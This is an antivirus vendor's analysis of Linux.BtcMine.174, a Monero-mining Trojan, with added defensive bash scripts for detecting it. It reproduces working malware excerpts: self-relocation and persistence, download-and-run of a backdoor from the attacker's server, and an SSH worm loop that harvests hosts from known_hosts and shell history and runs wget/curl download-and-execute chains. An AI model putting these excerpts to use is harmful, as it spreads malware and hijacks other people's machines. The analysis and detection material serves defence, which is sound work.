Linux.BtcMine.174

Added to the Dr.Web virus database: 2018-11-14

Virus description added:

Linux.BtcMine.174

  • 9ae9233c79390495e607059870671c9936c413c5
  • b59fc07afc9f159562f71b3a21c38b1d471acc2f

A multicomponent malware program capable of infecting Linux devices and intended to be used for Monero (XMR) mining. It is implemented as a shell script containing over 1,000 lines of code.

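When launched, it checks whether the server from which the Trojan will subsequently download additional modules is available. It then picks the directory those downloads are written to: the first entry in a fixed list of paths that is readable, writable, and executable for the current user: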

function GetDownloadPath()
{
    paths=("/usr/bin" "/bin" "/lib" "/boot" "/tmp" "/home/`whoami`" "`pwd`")
    for path in ${paths[@]}
    do
        if [ -x $path ] && [ -r $path ] && [ -w $path ]
        then
            DownloadPath=$path
            break
        fi
    done
}

If the script was not started with /sbin/init as its first argument, it performs the following actions:

  1. The script is moved to the previously selected folder with rwx permissions and renamed diskmanagerd (the name is specified in the $WatchDogName variable).
  2. The script tries to restart itself using nohup, or simply in the background if nohup is not installed (in this case, if it is running as root, the Trojan installs the coreutils package).

WatchDogName="diskmanagerd"
arg=$1
#...
function Nohup()
{
    if [ "$arg" != "/sbin/init" ]
    then
        rm -f $DownloadPath$WatchDogName >/dev/null 2>&1
        cp -rf $0 $DownloadPath$WatchDogName
        chmod 755 $DownloadPath$WatchDogName >/dev/null 2>&1
        rm -f $0
        nohup --help >/dev/null 2>&1
        if [ $? -eq 0 ]
        then
            nohup $DownloadPath$WatchDogName "/sbin/init"> $DownloadPath.templog 2>&1 &
            exit
        else
            if [ `id -u` -eq "0" ]
            then
                yum install coreutils -y  >/dev/null 2>&1
                apt-get install coreutils -y  >/dev/null 2>&1
                sleep 30
            fi
            (exec $DownloadPath$WatchDogName "/sbin/init" &> /dev/null &)
            exit
        fi
    fi
}

Then the Trojan downloads and runs a version of the Linux.BackDoor.Gates.9 Trojan. This family of backdoors allows commands issued by cybercriminals to be executed and DDoS attacks to be carried out:

function oh_cause_she_is_dead()
{
    md5sum --help >/dev/null 2>&1
    if [ "$?" = "0" ]
    then
        if [ `id -u` -eq "0" ]
        then
            DownloadFile "md5" "$mdfive_root" "http://$remote_host/syn" "$DownloadPath$DownloadFileName"
        else
            DownloadFile "md5" "$mdfive_user" "http://$remote_host/udp" "$DownloadPath$DownloadFileName"
        fi
    else
        if [ `id -u` -eq "0" ]
        then
            DownloadFile "size" "$DownloadFileSize" "http://$remote_host/syn" "$DownloadPath$DownloadFileName"
        else
            DownloadFile "size" "$DownloadFileSize" "http://$remote_host/udp" "$DownloadPath$DownloadFileName"
        fi
    fi
    chmod 755 "$DownloadPath$DownloadFileName"
    $DownloadPath$DownloadFileName
}

After that, the malware program searches for other miners and removes any it detects. To do this, it scans /proc/${pid}/exe and /proc/${pid}/cmdline for specific strings (cryptonight, stratum+tcp, etc.).
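
The same /proc scan serves a defender looking for miner processes, this Trojan's own miner included. The following is an added example, not code from the Trojan or from Dr.Web; the function names, the optional proc-root argument and the sample entries are assumptions, and the two patterns are the ones named above.

```bash
#!/usr/bin/env bash
# Added example: list processes whose command line or executable path
# contains the miner markers named in the description.
# find_miner_procs and make_sample_proc are hypothetical names.

find_miner_procs() {
    local proc_root="${1:-/proc}" pattern='cryptonight|stratum\+tcp'
    local dir pid cmd exe
    for dir in "$proc_root"/[0-9]*; do
        [ -r "$dir/cmdline" ] || continue
        pid="${dir##*/}"
        # cmdline is NUL-separated; turn the separators into spaces for matching.
        cmd="$(tr '\0' ' ' < "$dir/cmdline")"
        # exe is a symlink to the running binary (unreadable without privileges).
        exe="$(readlink "$dir/exe" 2>/dev/null || true)"
        if printf '%s\n%s\n' "$cmd" "$exe" | grep -Eqi "$pattern"; then
            printf '%s\t%s\t%s\n' "$pid" "${exe:-?}" "$cmd"
        fi
    done
}

# Constructed sample: a fake /proc tree with one miner-like and one benign entry.
make_sample_proc() {
    local root
    root="$(mktemp -d)"
    mkdir -p "$root/4242" "$root/1"
    printf 'xmr-sample\0-o\0stratum+tcp://pool.example:3333\0' > "$root/4242/cmdline"
    printf '/sbin/init\0' > "$root/1/cmdline"
    printf '%s\n' "$root"
}

sample="$(make_sample_proc)"
find_miner_procs "$sample"   # on a real host: find_miner_procs (defaults to /proc)
rm -rf "$sample"
```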

If Linux.BtcMine.174 was not launched as root, it downloads and runs another shell script (SHA1: 9ae9233c79390495e607059870671c9936c413c5) from the attackers’ server, which, in turn, downloads and runs a number of exploits to escalate its privileges in the system: Linux.Exploit.CVE-2016-5195 (DirtyCow) and Linux.Exploit.CVE-2013-2094.

In the next step, the script checks to see whether it is running as root. If it is, it stops services, removes their files using package managers, and empties the directories. The names of the following services are listed in the script: safedog, aegis, yunsuo, clamd, avast, avgd, cmdavd, cmdmgd, drweb-configd, drweb-spider-kmod, esets, xmirrord.

Then the Trojan adds itself to the autorun list, using /etc/rc.local, /etc/rc.d/..., /etc/cron.hourly. After that, it downloads and launches a rootkit, which is also implemented as a shell script. Among the rootkit module’s notable features is the ability to steal user-entered passwords for the su command and to hide files in the file system, network connections, and running processes.
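
A triage check for the watchdog copy and the autorun references described above, as an added example that is not code from the Trojan or from Dr.Web. The function names, the root-prefix argument and the sample tree are assumptions; the file name and locations come from the description.

```bash
#!/usr/bin/env bash
# Added example: look for the diskmanagerd copy, its .templog file and autorun
# references. btcmine174_triage and make_sample_root are hypothetical names.

btcmine174_triage() {
    local root="${1:-}" name="diskmanagerd" dir f hit
    # Directories from GetDownloadPath (the per-user home and cwd entries are omitted).
    for dir in /usr/bin /bin /lib /boot /tmp; do
        # The excerpts join $DownloadPath and $WatchDogName with no separator,
        # so check both "<dir>/<name>" and "<dir><name>", and likewise .templog.
        for f in "$dir/$name" "$dir$name" "$dir/.templog" "$dir.templog"; do
            if [ -e "$root$f" ]; then printf 'FILE\t%s\n' "$f"; fi
        done
    done
    # Autorun locations listed in the description.
    for f in /etc/rc.local /etc/rc.d /etc/cron.hourly; do
        [ -e "$root$f" ] || continue
        grep -rl -- "$name" "$root$f" 2>/dev/null | while IFS= read -r hit; do
            printf 'AUTORUN\t%s\n' "${hit#"$root"}"
        done
    done
    return 0
}

# Constructed sample: an offline tree with the artifacts planted.
make_sample_root() {
    local r
    r="$(mktemp -d)"
    mkdir -p "$r/tmp" "$r/usr/bin" "$r/etc/cron.hourly"
    : > "$r/tmp/diskmanagerd"
    : > "$r/tmp/.templog"
    printf '#!/bin/sh\n/tmp/diskmanagerd /sbin/init\n' > "$r/etc/cron.hourly/sample"
    printf '#!/bin/sh\nexit 0\n' > "$r/etc/rc.local"
    printf '%s\n' "$r"
}

sample="$(make_sample_root)"
btcmine174_triage "$sample"
rm -rf "$sample"
```

Because the rootkit hides files and processes, run the check against a mounted disk image or from rescue media and pass the mount point as the argument; a clean result on the live system is not conclusive.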

After that, the Trojan runs a feature that collects data from various sources about all the hosts to which the current user has previously connected via SSH. The Trojan tries to connect to these hosts and infect them:

cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h
cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h
cat /tmp/.h|grep -v 127.0.0.1|grep -v localhost|sort -u > /tmp/.hh
cat /tmp/.hh > /tmp/.h
rm -rf /tmp/.hh
for i in `cat /tmp/.h`
do
    (
        exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget -c -O /tmp/ ;curl -o /tmp/ ;python -c \"import urllib;urllib.urlretrieve(\\\"\\\", \\\"/tmp/\\\")\";php -r '\$f=fopen(\"'/tmp/'\",\"w\");fwrite(\$f, implode(\"\",@file(\"''\")));fclose(\$f);';ruby -e \"require 'open-uri';File.open('/tmp/', 'w') {|f| f.write(open('') {|f1| f1.read})}\";perl -MNet::FTP -e \"\\\$ftp = Net::FTP->new(\\\"\\\");\\\$ftp->login('', '');\\\$ftp->binary;\\\$ftp->get(\\\"\\\",\\\"/tmp/\\\")\";chmod 755 /tmp/;(exec /tmp/ &> /dev/null &)" &> /dev/null &
    )
done
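
The harvesting above depends on known_hosts storing host names in clear text in the first field. The following added example (not code from the Trojan or from Dr.Web) audits known_hosts files for such entries; the function names and the sample file, including its key and hash values, are constructed.

```bash
#!/usr/bin/env bash
# Added example: count known_hosts entries whose host names are stored in clear
# text versus hashed "|1|salt|hash" entries.
# audit_known_hosts and make_sample_known_hosts are hypothetical names.

audit_known_hosts() {
    local file
    for file in "$@"; do
        [ -r "$file" ] || continue
        awk -v f="$file" '
            NF == 0 || $1 ~ /^#/ { next }   # skip blank lines and comments
            {
                # A leading @cert-authority or @revoked marker shifts the host field.
                host = ($1 ~ /^@/) ? $2 : $1
                if (index(host, "|1|") == 1) hashed++; else plain++
            }
            END { printf "%s\tplain=%d\thashed=%d\n", f, plain, hashed }
        ' "$file"
    done
}

# Constructed sample file: two clear-text entries, one hashed entry, one comment.
make_sample_known_hosts() {
    local f
    f="$(mktemp)"
    {
        printf '%s\n' '192.0.2.10 ssh-ed25519 CONSTRUCTED-KEY-1'
        printf '%s\n' 'db1.example.com,192.0.2.20 ssh-rsa CONSTRUCTED-KEY-2'
        printf '%s\n' '|1|Y29uc3RydWN0ZWQ=|c2FtcGxlLWhhc2g= ssh-ed25519 CONSTRUCTED-KEY-3'
        printf '%s\n' '# constructed comment line'
    } > "$f"
    printf '%s\n' "$f"
}

sample="$(make_sample_known_hosts)"
audit_known_hosts "$sample"
rm -f "$sample"
```

On a real host, pass /root/.ssh/known_hosts and /home/*/.ssh/known_hosts. The OpenSSH client option HashKnownHosts yes stores new entries hashed and ssh-keygen -H -f FILE rehashes an existing file; addresses recorded in shell history are unaffected.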

Next, the Trojan launches and maintains a Monero (XMR) miner. In an infinite loop, the script checks for updates on a remote server so that it can download and install them if they become available. To do that, it carries out the following actions:

  1. The current script version number is stored in the $shell_ver variable.
  2. The file http://${remote_host}:${remote_port}/shell_ver.txt is downloaded.
  3. The obtained version is checked against the current one. If they match, nothing happens; if they do not match, the Trojan downloads the new script version from the management server.

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.